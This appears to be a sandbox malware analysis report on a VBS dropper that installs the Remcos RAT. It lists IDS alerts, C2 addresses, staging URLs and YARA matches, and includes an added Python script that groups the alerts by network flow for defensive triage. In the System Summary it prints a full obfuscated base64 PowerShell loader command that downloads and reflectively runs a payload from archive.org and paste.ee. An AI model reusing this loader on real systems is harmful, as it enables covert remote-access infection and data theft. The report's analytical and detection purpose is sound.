Source: Binary string: System.Data.Linq.pdb; source: powershell.exe, 00000006.00000002.1417039022.00000208FBA90000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F444C000.00000004.00000800.00020000.00000000.sdmp

                  Software Vulnerabilities

                  Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49707 -> 192.169.69.26:3000
                  Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49716 -> 192.169.69.26:3000
                  Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49720 -> 192.169.69.26:3000
                  Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49722 -> 192.169.69.26:3000
                  Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49724 -> 192.169.69.26:3000
                  Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49714 -> 192.169.69.26:3000
                  Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49715 -> 192.169.69.26:3000
                  Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49723 -> 192.169.69.26:3000
                  Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49721 -> 192.169.69.26:3000
                  Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49719 -> 192.169.69.26:3000
                  Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49717 -> 192.169.69.26:3000
                  Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.11:49706 -> 188.114.96.3:443
                  Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 188.114.96.3:443 -> 192.168.2.11:49706
                  Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 188.114.96.3:443 -> 192.168.2.11:49706
                  Source: Malware configuration extractor | URLs: 23spt.duckdns.org
                  Source: unknown | DNS query: name: paste.ee
                  Source: unknown | DNS query: name: 23spt.duckdns.org
                  Source: global traffic | HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1 | Host: ia600100.us.archive.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /d/nJcWp/0 HTTP/1.1 | Host: paste.ee | Connection: Keep-Alive
                  Source: Joe Sandbox View | IP Address: 188.114.96.3
                  Source: Joe Sandbox View | IP Address: 192.169.69.26
                  Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                  Source: Joe Sandbox View | ASN Name: WOWUS
                  Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic | HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1 | Host: ia600100.us.archive.org | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /d/nJcWp/0 HTTP/1.1 | Host: paste.ee | Connection: Keep-Alive
                  Source: global traffic | DNS traffic detected: DNS query: ia600100.us.archive.org
                  Source: global traffic | DNS traffic detected: DNS query: paste.ee
                  Source: global traffic | DNS traffic detected: DNS query: 23spt.duckdns.org
                  Source: powershell.exe, 00000002.00000002.1427139598.000001C4654D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
                  Source: powershell.exe, 00000002.00000002.1427370499.000001C4671C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.v
                  Source: powershell.exe, 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4B38000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ia600100.us.archive.org
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://paste.ee
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4CD8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: wscript.exe, 00000000.00000003.1264393743.000001D788743000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.dmt
                  Source: powershell.exe, 00000002.00000002.1429078475.000001C4672E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1378588214.00000208E3431000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4B85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4CD8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000002.00000002.1429078475.000001C467332000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6
                  Source: powershell.exe, 00000002.00000002.1429078475.000001C46734B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1378588214.00000208E3431000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee;
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com;
                  Source: powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.gstatic.com;
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4CD8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E46AC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4B33000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.arX
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E46AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1378588214.00000208E3652000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.archive.org
                  Source: powershell.exe, 00000006.00000002.1414917248.00000208FB430000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.archive.org/
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3652000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3652000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVw3;w1Zbase64Content
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4E50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4B85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E4B85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3863000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3863000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/nJcWp/0
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://secure.gravatar.com
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://themes.googleusercontent.com
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com;
                  Source: powershell.exe, 00000006.00000002.1378588214.00000208E3A3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
                  Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknown | HTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.11:49705 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.11:49706 version: TLS 1.2
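The Networking section above mixes three different things on one list: the repeated Remcos check-ins to 192.169.69.26:3000, the one-off staging downloads from archive.org and paste.ee, and two ET EXPLOIT_KIT "Unknown EK Landing ... b64" hits. Grouping the alerts by the sandbox-side port (one TCP flow each) separates them: the check-in signature fires once per new connection to the same endpoint, while both EK signatures and the ETPRO "Terse Request to paste .ee" alert share client port 49706, so they fired on the paste.ee response (a base64 blob, hence the "b64" rule names), not on a separate exploit-kit landing page. The Python below is an added example, not part of Joe Sandbox; the report lines it parses are copied from this page (a subset of the check-in alerts), and the 192.168.2.0/24 "sandbox side" range is an assumption derived from the 192.168.2.11 analysis VM address in the report.

```python
"""Group this report's network indicators per TCP flow.

REPORT_LINES are copied from the report's Networking section (a subset of
the Suricata alerts plus the DNS, HTTP and config-extractor lines). The
parser and the grouping logic are an added example, not part of Joe Sandbox.
"""
import ipaddress
import re
from collections import Counter, defaultdict

# The report shows the analysis VM as 192.168.2.11; assumption: its /24 is the local side.
SANDBOX_NET = ipaddress.ip_network("192.168.2.0/24")

REPORT_LINES = [
    "Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49707 -> 192.169.69.26:3000",
    "Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49716 -> 192.169.69.26:3000",
    "Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49720 -> 192.169.69.26:3000",
    "Source: Network traffic | Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.11:49722 -> 192.169.69.26:3000",
    "Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.11:49706 -> 188.114.96.3:443",
    "Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 188.114.96.3:443 -> 192.168.2.11:49706",
    "Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 188.114.96.3:443 -> 192.168.2.11:49706",
    "Source: Malware configuration extractor | URLs: 23spt.duckdns.org",
    "Source: global traffic | HTTP traffic detected: GET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1 | Host: ia600100.us.archive.org | Connection: Keep-Alive",
    "Source: global traffic | HTTP traffic detected: GET /d/nJcWp/0 HTTP/1.1 | Host: paste.ee | Connection: Keep-Alive",
    "Source: global traffic | DNS traffic detected: DNS query: ia600100.us.archive.org",
    "Source: global traffic | DNS traffic detected: DNS query: paste.ee",
    "Source: global traffic | DNS traffic detected: DNS query: 23spt.duckdns.org",
]

ALERT_RE = re.compile(
    r"Suricata IDS:\s*(\d+) - Severity (\d+) - (.+?) : "
    r"(\d{1,3}(?:\.\d{1,3}){3}):(\d+) -> (\d{1,3}(?:\.\d{1,3}){3}):(\d+)")
# Host regex tolerates the raw report form where "Host:" and "Connection:" are glued together.
HTTP_RE = re.compile(r"HTTP traffic detected:\s*(GET|POST) (\S+) HTTP/1\.[01].*?Host:\s*"
                     r"([A-Za-z0-9.-]+?)(?=Connection:|\s|\||$)")
DNS_RE = re.compile(r"DNS query:\s*(?:name:\s*)?([A-Za-z0-9.-]+)")
CONFIG_RE = re.compile(r"configuration extractor.*?URLs:\s*(\S+)")


def parse(lines):
    """Index alerts by sandbox-side port (one TCP flow each); collect HTTP, DNS and config data."""
    flows, remote = defaultdict(list), {}
    http, dns, config_urls = [], [], []
    for line in lines:
        if m := ALERT_RE.search(line):
            sid, sev, msg, src, sport, dst, dport = m.groups()
            outbound = ipaddress.ip_address(src) in SANDBOX_NET
            local_port = int(sport) if outbound else int(dport)
            remote[local_port] = (dst, int(dport)) if outbound else (src, int(sport))
            flows[local_port].append({"sid": int(sid), "severity": int(sev), "msg": msg.strip(),
                                      "direction": "out" if outbound else "in"})
        elif m := HTTP_RE.search(line):
            http.append(m.groups())           # (method, path, host)
        elif m := DNS_RE.search(line):
            dns.append(m.group(1))
        elif m := CONFIG_RE.search(line):
            config_urls.append(m.group(1))
    return {"flows": dict(flows), "remote": remote, "http": http, "dns": dns,
            "config_urls": config_urls}


def beacon_endpoints(summary, min_flows=2):
    """Remote endpoints hit by the same outbound ET/ETPRO MALWARE signature on several distinct flows.
    A RAT check-in repeats once per connection; a one-off download (the paste.ee fetch) does not."""
    hits = Counter()
    for port, alerts in summary["flows"].items():
        for a in alerts:
            words = a["msg"].split()
            if a["direction"] == "out" and len(words) > 1 and words[1] == "MALWARE":
                hits[(summary["remote"][port], a["sid"])] += 1
    return {endpoint: n for (endpoint, _sid), n in hits.items() if n >= min_flows}


def co_flow_alerts(summary, sid):
    """Other signatures that fired on the same flow(s) as `sid`, keyed by sandbox-side port."""
    return {port: sorted({a["sid"] for a in alerts} - {sid})
            for port, alerts in summary["flows"].items()
            if any(a["sid"] == sid for a in alerts)}


if __name__ == "__main__":
    summary = parse(REPORT_LINES)
    print("C2 candidates:", beacon_endpoints(summary))
    print("alerts sharing a flow with EK sid 2020423:", co_flow_alerts(summary, 2020423))
    print("staging requests:", summary["http"])
```

With the four check-in lines embedded here the C2 candidate is 192.169.69.26:3000 seen on four flows; with all eleven lines from the report it is the same endpoint on eleven. The EK signatures resolve to flow 49706, whose remote end is 188.114.96.3:443 and whose only outbound alert is the paste.ee download, which is the evidence for treating them as payload-content hits rather than as an exploit kit.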

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Source: Yara match | File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTR

                  E-Banking Fraud

                  Source: Yara match | File source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2545392429.0000000000BE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2545915861.000000000268E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 0000000B.00000002.2545392429.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTR
                  Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  System Summary

                  Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                  Source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7360, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR | Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                  Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process Stats: CPU usage > 49%
                  Source: OIQ1ybtQdW.vbs | Initial sample: Strings found which are bigger than 50
                  Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 6.2.powershell.exe.208f494bc00.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 6.2.powershell.exe.208f494bc00.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000B.00000002.2544026663.0000000000458000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
